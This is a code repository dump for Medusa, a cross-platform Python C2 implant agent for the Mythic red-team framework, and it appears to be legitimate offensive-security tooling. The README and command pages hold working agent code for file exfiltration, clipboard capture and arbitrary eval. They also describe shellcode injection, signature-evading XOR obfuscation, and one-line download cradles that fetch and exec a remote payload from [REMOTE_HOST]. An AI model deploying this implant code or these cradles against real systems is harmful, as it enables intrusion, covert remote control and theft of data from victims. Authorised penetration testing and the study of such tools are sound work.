Modified": { "plaintext": new Date(entries[i]['last_modified'] * 1000).toString() }, "actions": {"button": { "name": "Actions", "type": "menu", "value": [ { "name": "View All Data", "type": "dictionary", "value": entries[i], "leftColumnTitle": "Field", "rightColumnTitle": "Value", "title": "Viewing All Data" }, ] }}, "rowStyle": {} }) } return { "table": [ { "headers": [ {"plaintext": "Client", "type": "string", "fillWidth": true}, {"plaintext": "Service", "type": "string", "fillWidth": true}, {"plaintext": "Client Type", "type": "string", "width": 160}, {"plaintext": "Auth Value", "type": "string", "width": 130}, {"plaintext": "Auth Reason", "type": "string", "width": 135}, {"plaintext": "Last Modified", "type": "string", "width": 285}, {"plaintext": "actions", "type": "button", "width": 90, "disableSort": true}, ], "rows": output_table, "title": "TCC" } ] } }catch(error){ console.log(error); const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/vscode_edits.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(responses.length == 1){ try{ let folder = { backgroundColor: "mediumpurple", color: "white" }; let file = {}; let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); let entries = data["edits"]; let output_table = []; for(let i = 0; i < entries.length; i++){ output_table.push({ "Backup File":{ "plaintext": entries[i]["backup"], "copyIcon": true }, "Original File":{ "plaintext": entries[i]["original"] }, "Size":{ "plaintext": entries[i]["size"] }, "Modified Time":{ "plaintext": entries[i]["mtime"] }, "Created Time":{ "plaintext": entries[i]["ctime"] }, "Type":{ "plaintext": entries[i]["type"] }, "rowStyle": {}, }) } return { "table": [ { "headers": [ {"plaintext": "Backup File", "type": "string", "fillWidth": true}, {"plaintext": "Original File", "type": "string", "fillWidth": true}, {"plaintext": "Size", "type": "string", "width": 80}, {"plaintext": "Modified Time", "type": "string", "width": 200}, {"plaintext": "Created Time", "type": "string", "width": 200}, {"plaintext": "Type", "type": "string", "width": 80}, ], "rows": output_table, "title": "Unsaved VSCode Edits" } ] } }catch(error){ console.log(error); const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/vscode_recent.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(responses.length == 1){ try{ let folder = { backgroundColor: "mediumpurple", color: "white" }; let file = {}; let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); let entries = data["recents"]; let output_table = []; for(let i = 0; i < entries.length; i++){ var icon = ""; var rs = {}; if (entries[i]["type"] == "folder") { icon = 'closedFolder'; rs = folder; } else { icon = 'code/source'; rs = file; } output_table.push({ "Name":{ "plaintext": entries[i]["path"], "startIcon": icon }, "rowStyle": rs, }) } return { "table": [ { "headers": [ {"plaintext": "Name", "type": "string", "fillWidth": true}, ], "rows": output_table, "title": "Recent VSCode Files" } ] } }catch(error){ console.log(error); const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/rabbitmq_config.json ================================================ { "username": "mythic_user", "password": "mythic_password", "virtual_host": "mythic_vhost", "host": "127.0.0.1", "name": "hostname", "rabbitmq_password": "rabbitmq_password", "rabbitmq_host": "127.0.0.1", "mythic_server_host": "127.0.0.1", "container_files_path": "/Mythic/" } ================================================ FILE: README.md ================================================

Medusa Logo

# Medusa Medusa is a cross-platform agent compatible with both Python 3.8 and Python 2.7. ## Installation To install Medusa, you'll need Mythic v3 installed on a remote computer. You can find installation instructions for Mythic at the [Mythic project page](https://github.com/its-a-feature/Mythic/). From the Mythic install root, run the command: `./mythic-cli install github https://github.com/MythicAgents/Medusa.git` Once installed, restart Mythic to build a new agent. ## RabbitMQ Config Notes The file [Payload_Type/medusa/rabbitmq_config.json](Payload_Type/medusa/rabbitmq_config.json) is a template and must match your Mythic environment. - Set `rabbitmq_password` to your Mythic `RABBITMQ_PASSWORD` value (typically from Mythic `.env`). - Set `rabbitmq_host` to your RabbitMQ host/container name (often `mythic_rabbitmq` in docker-compose setups, or `127.0.0.1` for local binds). - Set `mythic_server_host` to your Mythic server host/container name (often `mythic_server` in docker-compose setups, or `127.0.0.1` for local binds). ## Notable Features - Dynamic loading/unloading of agent functions to limit exposure of agent capabilities on-disk. - Loading of Python modules in-memory for use in custom scripts. - Cross-platform SOCKS5 proxy - macOS clipboard reader, screenshot grabber and TCC database parsing - File browser compatibility with upload/download - Eval() of dynamic Python code - Basic Authentication Proxy compatibility ## Commands Manual Quick Reference The base agent and included commands all use built-in Python libraries, so do not need additional packages to function. Agents will run the commands in threads, so long-running uploads or downloads won't block the main agent. ### General Commands Command | Syntax | Description ------- | ------ | ----------- cat | `cat path/to/file` | Read and output file content. cd | `cd [.. dir]` | Change working directory (`..` to go up one directory). cp | `cp src_file_or_dir dst_file_or_dir` | Copy file or folder to destination. cwd | `cwd` | Print working directory. download | `download [path]` | Download a file from the target system. download_bulk | `download_bulk [path1] [path2] ...` | Download multiple files from the target system in one task. exit | `exit` | Exit a callback. env | `env` | Print environment variables. eval_code | `eval_code [commands]` | Execute python code and return output. jobkill | `jobkill [task id]` | Send stop signal to long running task. jobs | `jobs` | List long-running tasks, such as downloads. list_modules | `list_modules [module_name]` | Lists in-memory modules or the full file listing for a specific module. load | `load command` | Load a new capability into an agent. load_module | `load_module` | Load a zipped Python module into memory (adapted from [here](https://github.com/sulinx/remote_importer) and [here](https://github.com/EmpireProject/EmPyre/blob/master/data/agent/agent.py#L464)). load_script | `load_script` | Load and execute a Python script through the agent. ls | `ls [. path]` | List files and folders in `[path]` or use `.` for current working directory. mv | `mv src_file_or_dir dst_file_or_dir` | Move file or folder to destination. pip_freeze | `pip_freeze` | Programmatically list installed packages on system. rm | `rm file_or_dir` | Delete file or folder. shell | `shell [command]` | Run a shell command which will spawn using subprocess.Popen(). Note that this will wait for command to complete so be careful not to block your agent. socks | `socks start/stop [port]` | Start/stop SOCKS5 proxy through Medusa agent. sleep | `sleep [seconds] [jitter percentage]` | Set the callback interval of the agent in seconds. unload | `unload command` | Unload an existing capability from an agent. unload_module | `unload_module module_name` | Unload a Python module previously loaded into memory. upload | `upload` | Upload a file to a remote path on the machine. watch_dir | `watch_dir path seconds` | Watch for changes in target directory, polling for changes at a specified rate. ### macOS Commands Command | Syntax | Description ------- | ------ | ----------- clipboard | `clipboard` | Output contents of clipboard (uses Objective-C API, as outlined by Cedric Owens [here](https://github.com/cedowens/MacC2/blob/main/client.py#L90). macOS only, Python 2.7 only). list_apps | `list_apps` | List macOS applications (Python 2.7 only, macOS only). list_tcc | `list_tcc [path]` | List entries in macOS TCC database (requires full-disk access and Big Sur only atm). screenshot | `screenshot` | Take a screenshot (uses Objective-C API, macOS only, Python 2.7 only). spawn_jxa | `spawn_jxa` | Spawn an `osascript` process and pipe Javascript content to it. vscode_list_recent | `vscode_list_recent [state_db]` | Lists files and folders recently opened with VSCode. vscode_open_edits | `vscode_open_edits [backup_dir_path]` | Lists unsaved changes made to files in VSCode. vscode_watch_edits | `vscode_watch_edits [path to remote dir] [poll_interval]` | Poll the VSCode backups directory at a given interval for unsaved edits. ### Windows Commands Command | Syntax | Description ------- | ------ | ----------- shinject | `shinject` | Inject shellcode into target PID using CreateRemoteThread (Windows only - adapted from [here](https://gist.github.com/RobinDavid/9214020)). load_dll | `load_dll dll_path dll_export` | Load an on-disk DLL and execute an exported function (NOTE: This DLL must return an int value on completion, an msfvenom-created DLL, for example, will kill your agent upon completion). list_dlls | `list_dlls [pid]` | Read process memory (PEB) of local or target process to fetch list of loaded DLLs (Python 3 only) ps | `ps` | Get limited process information, e.g. PID, process names, architecture and binary paths (Python 3 only) ps_full | `ps_full` | Get full process information, including PPID, integrity level and command line (Python 3 only) kill | `kill` | Terminate a process by process ID (Python 3 only) ## Python Versions Both versions of the Medusa agent use an AES256 HMAC implementation written with built-in libraries (adapted from [here](https://github.com/boppreh/aes)), removing the need for any additional dependencies beyond a standard Python install. As such the agent should operate across Windows, Linux and macOS hosts. It's worth mentioning that this crypto implementation does introduce some overhead when handling large files (screenshotting, downloads, etc.) but it's workable. ### Py2 vs Py3 Commands Within the `Payload_Type/Medusa/agent_code` directory, you will see `base_agent` files with both `py2` and `py3` suffixes. Likewise, similar file extensions can be seen for individual function files too. These are read by the `builder.py` script to firstly select the right base Python version of the Medusa agent. `builder.py` will then include commands that are specific to the chosen python version. In the case where a command only has a `.py` extension, this will be used by default, with the assumption being that no alternative code is needed between the Py2 and Py3 versions. ## Threaded Jobs Medusa uses basic threading for job execution. Where jobs are potentially long-running, they can be implemented with a 'stop check' to respond to a signal from the `jobkill` task. This can be implemented with a code snippet similar to that shown below: ``` if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: # Some job-specific tidy up return "Job stopped." ``` This handler can be seen implemented within the `download`, `upload`, `watch_dir` and `screenshot` commands. Additionally, if the long-running job is expected to provide continuous output, the `sendTaskOutputUpdate` function - included in the base agent - can be used to update Mythic prior to the task completion. A dummy function that provides continuous output and can be `jobkill`'d can be seen below. ``` def dummyFunction(self, task_id): while(True): # Check if we've got a stop signal. if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." # Send output back to Mythic self.sendTaskOutputUpdate(task_id, "We're still running") time.sleep(10) ``` ## Supported C2 Profiles Medusa currently supports two C2 profiles: `http` (both with and without AES256 HMAC encryption) and `azure_blob`. ### HTTP Profile The HTTP profile calls back to the Mythic server over the basic, non-dynamic profile. GET requests for taskings, POST requests with responses. ## Thanks - Browser scripts and agent code adapted from [@its_a_feature_](https://twitter.com/its_a_feature_) and [@djhohnstein](https://twitter.com/djhohnstein). - [MacC2](https://github.com/cedowens/MacC2/) and [this](https://medium.com/red-teaming-with-a-blue-team-mentality/making-objective-c-calls-from-python-standard-libraries-550ed3a30a30) blog post from Cedric Owens - [EmPyre](https://github.com/EmpireProject/EmPyre/) and [this](https://www.xorrior.com/In-Memory-Python-Imports/) blog post from Chris Ross. - The crypto wizardry found [here](https://github.com/boppreh/aes). - Agent icon from [flaticon.com](https://www.flaticon.com) ================================================ FILE: config.json ================================================ { "exclude_payload_type": false, "exclude_c2_profiles": false, "exclude_documentation_payload": false, "exclude_documentation_c2": true, "exclude_agent_icons": false } ================================================ FILE: documentation-c2/.keep ================================================ ================================================ FILE: documentation-payload/.keep ================================================ ================================================ FILE: documentation-payload/medusa/_index.md ================================================ +++ title = "Medusa" chapter = false weight = 5 +++ ![logo](/agents/medusa/medusa.svg?width=200px) ## Summary Medusa is a cross-platform Python agent compatible with Python 2.7 and 3.8. ### Highlighted Agent Features Python is an incredibly popular programming language and is often installed by default on many operating systems. Python 2.7, for example, is currently available on the latest macOS installs (though expected to be discontinued). Default libraries, such as `Cocoa` and `ctypes`, allow access to Objective-C APIs and functionality through Windows DLLs. The Medusa agent itself has several key features including: - Support for dynamic loading/unloading of functionality to limit exposure of agent capabilities on-disk. - A SOCKS5 proxy compatible across Python 2.7 and 3.8, and across macOS, Windows and Linux. - Encrypted comms. - `Eval()` of Python code to dynamically extend functionality. With the ability to execute arbitrary script on the command-line, a rudementary download cradle can be used, such as the below (notably, not proxy-aware): ``` python3 -c "import urllib.request; exec(urllib.request.urlopen('https://[REMOTE_HOST]/medusa.py').read())" & ``` Or for Python 2.7: ``` python -c "import urllib2;exec(urllib2.urlopen('https://[REMOTE_HOST]/medusa.py').read())" & ``` ### Build Options This section provides details of what each Medusa-specific build option provides #### Python Version Pretty self-explanatory, select which version of Python the Medusa agent should be created for. See the Development section for details of how this works under the hood. #### Output Format Mythic can provide the final agent code as a Python script, or as a Base64-encoded blob. Note that this is the last stage of the process effectively. So any XOR obfuscation, crypto library selection or Python version selection will take place before this. #### Cryptography library Medusa agents can be built using either a manual crypto implementation or using the non-default `cryptography` library. Given, the manual implementation isn't going to be as quick or efficient as the main Python library (not to mention the extra code required), `cryptography` use might be the way to go. Though do bear in mind, it is not a default library and appears to only be installed on macOS by default. {{% notice info %}} Either option here won't affect the agents ability to use encrypted comms, it is purely to specify how the encrypted comms are achieved. {{% /notice %}} #### XOR and Base64-encode Finally, the plaintext Medusa script can be encrypted via XOR with a randomly-generated key, before being Base64 encoded. This blob is then wrapped with an unpacker and put in a `exec()` function to ultimately run the Medusa agent. This is designed to make the agent less signaturable when on-disk. See the OPSEC section for more details. #### Verify HTTPS Certificate By default, the web request libraries used in Medusa will fail when handling a self-signed certificate for HTTPS. This function introduces code to skip cert verification, so C2 can be established. ### Important Notes Each job is executed in a new thread. Long-running jobs can be viewed with the `jobs` command and, where a 'stop' functionality has been implemented, they can be killed with `jobkill`. ## Authors @ajpc500 ================================================ FILE: documentation-payload/medusa/c2_profiles/Azure_Blob.md ================================================ +++ title = "Azure Blob" chapter = false weight = 103 +++ ## Summary The `medusa` agent supports Azure Blob Storage as a transport profile. Tasking and responses are exchanged through blobs in the provisioned container: - Agent uploads request blobs to `ats/.blob` - Agent polls and downloads response blobs from `sta/.blob` - Agent deletes processed response blobs after retrieval At build time, Medusa calls the `azure_blob` service to provision scoped configuration and stamps the generated values into the payload. ### Profile Option Deviations #### Callback Interval / Jitter The Azure Blob transport uses callback interval and jitter to control polling cadence for `sta/` response blobs. #### HTTPS Verification If Medusa build parameter `https_check` is set to `No`, TLS certificate verification is disabled for blob operations. ### Build-Time Notes When `azure_blob` is selected, Medusa: 1. Requests configuration from the `azure_blob` service (`generate_config` RPC) 2. Embeds: - blob endpoint - container name - scoped SAS token 3. Uses the core+transport template assembly process to generate the final payload ================================================ FILE: documentation-payload/medusa/c2_profiles/HTTP.md ================================================ +++ title = "HTTP" chapter = false weight = 102 +++ ## Summary The `medusa` agent uses a series of `POST` web requests to send responses for tasking and a series of `GET` requests to get tasking from the Mythic server. ### Profile Option Deviations #### Callback Host The URL for the redirector or Mythic server. This must include the protocol to use (e.g. `http://` or `https://`). ================================================ FILE: documentation-payload/medusa/c2_profiles/_index.md ================================================ +++ title = "C2 Profiles" chapter = true weight = 25 pre = "4. " +++ # Supported C2 Profiles This section goes into any `medusa` specifics for the supported C2 profiles. Current supported profiles: - HTTP - Azure Blob ================================================ FILE: documentation-payload/medusa/commands/_index.md ================================================ +++ title = "Commands" chapter = true weight = 15 pre = "2. " +++ # medusa command reference These pages provide in-depth documentation and code samples for the `medusa` commands. ================================================ FILE: documentation-payload/medusa/commands/cat.md ================================================ +++ title = "cat" chapter = false weight = 100 hidden = false +++ ## Summary Outputs the string content of a given file. No need for quotes and relative paths are fine. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### path_to_read - Description: path to file we're going to read from - Required Value: True - Default Value: None ## Usage ``` cat /path/to/file ``` ## MITRE ATT&CK Mapping - T1005 ## Detailed Summary Prints the contents of a file on the target system: ```Python def cat(self, task_id, path): file_path = path if path[0] == os.sep \ else os.path.join(self.current_directory,path) with open(file_path, 'r') as f: content = f.readlines() return ''.join(content) ``` ================================================ FILE: documentation-payload/medusa/commands/cd.md ================================================ +++ title = "cd" chapter = false weight = 100 hidden = false +++ ## Summary Change the current working directory to another directory. No quotes are necessary and relative paths are fine - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### path - Description: path to change directory to - Required Value: True - Default Value: None ## Usage ### Without Popup Option ``` cd ../path/here ``` ## MITRE ATT&CK Mapping - T1083 ## Detailed Summary You can either type `cd` and get a popup to fill in the path, or provide the path on the command line. ```Python def cd(self, task_id, path): if path == "..": self.current_directory = os.path.dirname(os.path.dirname(self.current_directory + os.sep)) else: self.current_directory = path if path[0] == os.sep \ else os.path.abspath(os.path.join(self.current_directory,path)) ``` ================================================ FILE: documentation-payload/medusa/commands/clipboard.md ================================================ +++ title = "clipboard" chapter = false weight = 100 hidden = false +++ ## Summary Get all the types of contents on the clipboard, return specific types, or set the contents of the clipboard. {{% notice warning %}} Root does _*NOT*_ have a clipboard {{% /notice %}} - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Reading Clipboard ``` clipboard ``` This will read the plaintext data on the clipboard only. Any non-text content will be omitted. ## MITRE ATT&CK Mapping - T1115 ## Detailed Summary This uses Objective C API calls to read all the types available on the general clipboard for the current user. The clipboard on macOS has a lot more data than _just_ what you copy. All of that data is collected and returned in a JSON blob of key:base64(data). To do this, we use this JavaScript code: ```JavaScript let pb = $.NSPasteboard.generalPasteboard; let types = pb.types.js; let clipboard = {}; for(let i = 0; i < types.length; i++){ let typejs = types[i].js; clipboard[typejs] = pb.dataForType(types[i]); if(clipboard[typejs].js !== undefined){ clipboard[typejs] = clipboard[typejs].base64EncodedStringWithOptions(0).js; }else{ clipboard[typejs] = ""; } } ``` There's a browserscript for this function that'll return all of the keys and the plaintext data if it's there. ================================================ FILE: documentation-payload/medusa/commands/cp.md ================================================ +++ title = "cp" chapter = false weight = 100 hidden = false +++ ## Summary Copy a given file or folder to a specified location. No quotes are necessary and relative paths are fine - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### source_path - Description: path of file/folder to copy - Required Value: True - Default Value: None #### dest_path - Description: path to copy file/folder to - Required Value: True - Default Value: None ## Usage ### Without Popup Option ``` cp path/of/file_or_folder /dest/to/copy/to ``` ## Detailed Summary You can either type `cp` and get a popup to fill in the paths, or provide the paths on the command line. ```Python def cp(self, task_id, source, destination): import shutil source_path = source if source[0] == os.sep \ else os.path.join(self.current_directory,source) dest_path = destination if destination[0] == os.sep \ else os.path.join(self.current_directory,destination) if os.path.isdir(source_path): shutil.copytree(source_path, dest_path) else: shutil.copy(source_path, dest_path) ``` ================================================ FILE: documentation-payload/medusa/commands/cwd.md ================================================ +++ title = "cwd" chapter = false weight = 100 hidden = false +++ ## Summary Prints the current working directory for the agent - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` cwd ``` ## MITRE ATT&CK Mapping - T1083 ## Detailed Summary Prints the variable value used by Medusa to track current directory: ```Python def cwd(self, task_id): return self.current_directory ``` ================================================ FILE: documentation-payload/medusa/commands/download.md ================================================ +++ title = "download" chapter = false weight = 100 hidden = false +++ ## Summary Download a file from the target machine. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### remote_path - Description: /remote/path/on/victim.txt - Required Value: True - Default Value: None ## Usage ``` download /remote/path ``` ## MITRE ATT&CK Mapping - T1020 - T1030 - T1041 ## Detailed Summary This function uses API calls to chunk and transfer a file from the agent: ```Python def download(self, task_id, file): file_path = file if file[0] == os.sep \ else os.path.join(self.current_directory,file) file_size = os.stat(file_path).st_size total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0) data = { "action": "post_response", "responses": [ { "task_id": task_id, "total_chunks": total_chunks, "full_path": file_path, "chunk_size": CHUNK_SIZE }] } initial_response = self.postMessageAndRetrieveResponse(data) chunk_num = 1 with open(file_path, 'rb') as f: while True: if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." content = f.read(CHUNK_SIZE) if not content: break # done data = { "action": "post_response", "responses": [ { "chunk_num": chunk_num, "file_id": initial_response["responses"][0]["file_id"], "chunk_data": base64.b64encode(content).decode(), "task_id": task_id } ] } chunk_num+=1 response = self.postMessageAndRetrieveResponse(data) ``` ================================================ FILE: documentation-payload/medusa/commands/download_bulk.md ================================================ +++ title = "download_bulk" chapter = false weight = 100 hidden = false +++ ## Summary Bulk download file(s), director(ies), or a mix from the target machine. Two modes are supported: - **archive** *(default)*: all files are bundled into a single in-memory zip archive that is streamed back to the Mythic server. The archive is never written to disk on the target. - **iterative**: each file is transferred individually using the same chunked approach as the `download` command. The command automatically detects whether each supplied path is a file or a directory. When a directory is specified, all files within it (recursively) are included. Files that do not exist or are not accessible are skipped rather than causing the entire task to fail. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @maclarel ### Arguments #### path - Description: An array of file or directory paths to download. Multiple entries can be added through the Mythic UI or provided as a JSON array. - Required Value: True - Default Value: None #### mode - Description: `archive` (default) to bundle everything into a single in-memory zip, or `iterative` to transfer each file individually. - Required Value: False - Default Value: `archive` ## Usage Download an entire directory as a zip archive (default mode): ``` download_bulk {"path": ["/remote/directory"], "mode": "archive"} ``` Download a single file using archive mode: ``` download_bulk {"path": ["/remote/path/to/file.txt"]} ``` Download multiple specific files iteratively: ``` download_bulk {"path": ["/remote/file1.txt", "/remote/file2.txt"], "mode": "iterative"} ``` Download a directory, sending each file individually: ``` download_bulk {"path": ["/remote/directory"], "mode": "iterative"} ``` ## MITRE ATT&CK Mapping - T1020 - T1030 - T1041 ## Detailed Summary The `download_bulk` function extends the single-file `download` capability to support bulk transfers. ### Path detection The `path` argument accepts an array of paths. Each entry is resolved using `os.path.isdir` and `os.path.isfile`. Relative paths are resolved against the agent's current working directory: - **Directory** – the directory tree is walked with `os.walk`; every file found is added to the transfer list. - **File** – added directly to the transfer list. - **Non-existent** – skipped with a warning message; the task continues with remaining files. ### Archive mode An in-memory `zipfile.ZipFile` (backed by `io.BytesIO`) is created and populated with all target files. The zip data is then chunked and sent to the Mythic server using the same `download` API used by the single-file `download` command. Note: This can be extremely slow to transfer larger amounts of data due to chunking. Expect to take a walk or a nap if you're trying to pull thousands of files/hundreds of MB of data. Directory structure is preserved inside the zip using `os.path.relpath` to compute each entry's arcname: - **Directory input** (e.g. `/etc/nginx`): entries are anchored at the parent directory, so the top-level name is included — `nginx/nginx.conf`, `nginx/conf.d/default.conf`. - **Single file input**: only the filename is stored (`passwd`). - **Explicit list input**: entries are anchored at the filesystem root, preserving the full path — `etc/passwd`, `home/user/report.txt`. ### Iterative mode Each file is transferred individually in the same chunked manner as the existing `download` command. A separate `file_id` is obtained from Mythic for each file, and the agent streams each one to completion before moving on to the next. ```Python def download_bulk(self, task_id, path, mode="archive"): import zipfile, io # Build file list from path array (files, directories, or mix) ... if mode == "iterative": for file_path in file_list: # chunk and send each file (same as download()) ... else: # Build in-memory zip zip_buffer = io.BytesIO() with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf: for file_path in file_list: zf.write(file_path, arcname) # chunk and send zip_buffer.getvalue() ... ``` ================================================ FILE: documentation-payload/medusa/commands/env.md ================================================ +++ title = "env" chapter = false weight = 100 hidden = false +++ ## Summary Prints the environment variables for the current process - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` env ``` ## Detailed Summary Lists the contents of the `os.environ` list: ```Python def env(self, task_id): return "\n".join(["{}: {}".format(x, os.environ[x]) for x in os.environ]) ``` ================================================ FILE: documentation-payload/medusa/commands/eval_code.md ================================================ +++ title = "eval_code" chapter = false weight = 100 hidden = false +++ ## Summary Send and interpret new Python code. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### code - Description: code to execute - Required Value: True - Default Value: None ## Usage ``` eval_code {code to execute} ``` ## Detailed Summary Uses the `eval()` function to interpret a string containing arbitrary Python code: ```Python def eval_code(self, task_id, command): return eval(command) ``` ================================================ FILE: documentation-payload/medusa/commands/exit.md ================================================ +++ title = "exit" chapter = false weight = 100 hidden = false +++ ## Summary This exits the current Medusa agent. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` exit ``` ## Detailed Summary The command executes this call: ```Python def exit(self, task_id): os._exit(0) ``` ================================================ FILE: documentation-payload/medusa/commands/jobs.md ================================================ +++ title = "jobs" chapter = false weight = 100 hidden = false +++ ## Summary Lists the currently running jobs (aka long-running functions) for our agent. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` jobs ``` ## Detailed Summary Lists the long-running functions running for our agent, this omits the main thread, the jobs function itself and any threads associated with the SOCKS proxy (outside of the main SOCKS thread, which we do include): ```Python def jobs(self, task_id): out = [t.name.split(":") for t in threading.enumerate() \ if t.name != "MainThread" and "a2m" not in t.name \ and "m2a" not in t.name and t.name != "jobs:{}".format(task_id) ] if len(out) > 0: return { "jobs": out } else: return "No long running jobs!" ``` ================================================ FILE: documentation-payload/medusa/commands/kill.md ================================================ +++ title = "kill" chapter = false weight = 100 hidden = false +++ ## Summary This uses the ctypes library to interface with Windows API to terminate a process with a specified PID. - Python Versions Supported: 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` kill process_id ``` ## Detailed Summary This function takes a given PID and attempts to open a process handle and terminate it. ```Python def kill(self, task_id, process_id): import ctypes, ctypes.wintypes from ctypes import GetLastError NTSTATUS = ctypes.wintypes.LONG def _check_bool(result, func, args): if not result: raise ctypes.WinError(ctypes.get_last_error()) return args Kernel32 = ctypes.WinDLL('kernel32.dll') OpenProcess = Kernel32.OpenProcess OpenProcess.restype = ctypes.wintypes.HANDLE CloseHandle = Kernel32.CloseHandle CloseHandle.errcheck = _check_bool TerminateProcess = Kernel32.TerminateProcess TerminateProcess.restype = ctypes.wintypes.BOOL PROCESS_TERMINATE = 0x0001 PROCESS_QUERY_INFORMATION = 0x0400 try: hProcess = OpenProcess(PROCESS_TERMINATE | PROCESS_QUERY_INFORMATION, False, process_id) if hProcess: TerminateProcess(hProcess, 1) CloseHandle(hProcess) except Exception as e: return e ``` ================================================ FILE: documentation-payload/medusa/commands/list_apps.md ================================================ +++ title = "list_apps" chapter = false weight = 100 hidden = false +++ ## Summary This uses NSApplication.RunningApplications API to get information about running applications. - Python Versions Supported: 2.7 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` list_apps ``` ## MITRE ATT&CK Mapping - T1057 ## Detailed Summary This is different than executing `ps` in a terminal since this only reports back running applications, not _all_ processes running on a system. ```Python def list_apps(self, task_id): from Cocoa import NSWorkspace app_json = [] apps = NSWorkspace.sharedWorkspace().runningApplications() for app in apps: try: app_data = { "pid": str(app.processIdentifier()), "name": str(app.localizedName()), "exec_url": str(app.executableURL()) } app_json.append(app_data) except: pass return { "apps": app_json } ``` This output is turned into a sortable table via a browserscript. ================================================ FILE: documentation-payload/medusa/commands/list_dlls.md ================================================ +++ title = "list_dlls" chapter = false weight = 100 hidden = false +++ ## Summary This uses the ctypes library to interface with Windows API to read the local or a remote process's PEB and list the loaded DLLs. - Python Versions Supported: 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` list_dlls [process_id] ``` ## MITRE ATT&CK Mapping - T1057 ## Detailed Summary This function takes an optional PID. If none is given, it will list DLLs loaded in the current process. ```Python def list_dlls(self, task_id, process_id=0): import sys, os.path, ctypes, ctypes.wintypes from ctypes import create_unicode_buffer, GetLastError import re import datetime def _check_bool(result, func, args): if not result: raise ctypes.WinError(ctypes.get_last_error()) return args PULONG = ctypes.POINTER(ctypes.wintypes.ULONG) ULONG_PTR = ctypes.wintypes.LPVOID SIZE_T = ctypes.c_size_t NTSTATUS = ctypes.wintypes.LONG PVOID = ctypes.wintypes.LPVOID PROCESSINFOCLASS = ctypes.wintypes.ULONG Kernel32 = ctypes.WinDLL('kernel32.dll') OpenProcess = Kernel32.OpenProcess OpenProcess.restype = ctypes.wintypes.HANDLE CloseHandle = Kernel32.CloseHandle CloseHandle.errcheck = _check_bool GetCurrentProcess = Kernel32.GetCurrentProcess GetCurrentProcess.restype = ctypes.wintypes.HANDLE GetCurrentProcess.argtypes = () ReadProcessMemory = Kernel32.ReadProcessMemory ReadProcessMemory.errcheck = _check_bool ReadProcessMemory.argtypes = ( ctypes.wintypes.HANDLE, ctypes.wintypes.LPCVOID, ctypes.wintypes.LPVOID, SIZE_T, ctypes.POINTER(SIZE_T)) # WINAPI Definitions PROCESS_VM_READ = 0x0010 PROCESS_QUERY_INFORMATION = 0x0400 ERROR_INVALID_HANDLE = 0x0006 ERROR_PARTIAL_COPY = 0x012B WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7 MAX_PATH = 260 PROCESS_TERMINATE = 0x0001 PROCESS_QUERY_INFORMATION = 0x0400 ProcessBasicInformation = 0 ProcessDebugPort = 7 ProcessWow64Information = 26 ProcessImageFileName = 27 ProcessBreakOnTermination = 29 STATUS_UNSUCCESSFUL = NTSTATUS(0xC0000001) STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value STATUS_INVALID_HANDLE = NTSTATUS(0xC0000008).value STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value class RemotePointer(ctypes._Pointer): def __getitem__(self, key): # TODO: slicing size = None if not isinstance(key, tuple): raise KeyError('must be (index, handle[, size])') if len(key) > 2: index, handle, size = key else: index, handle = key if isinstance(index, slice): raise TypeError('slicing is not supported') dtype = self._type_ offset = ctypes.sizeof(dtype) * index address = PVOID.from_buffer(self).value + offset simple = issubclass(dtype, ctypes._SimpleCData) if simple and size is not None: if dtype._type_ == ctypes.wintypes.WCHAR._type_: buf = (ctypes.wintypes.WCHAR * (size // 2))() else: buf = (ctypes.c_char * size)() else: buf = dtype() nread = SIZE_T() Kernel32.ReadProcessMemory(handle, address, ctypes.byref(buf), ctypes.sizeof(buf), ctypes.byref(nread)) if simple: return buf.value return buf _remote_pointer_cache = {} def RPOINTER(dtype): if dtype in 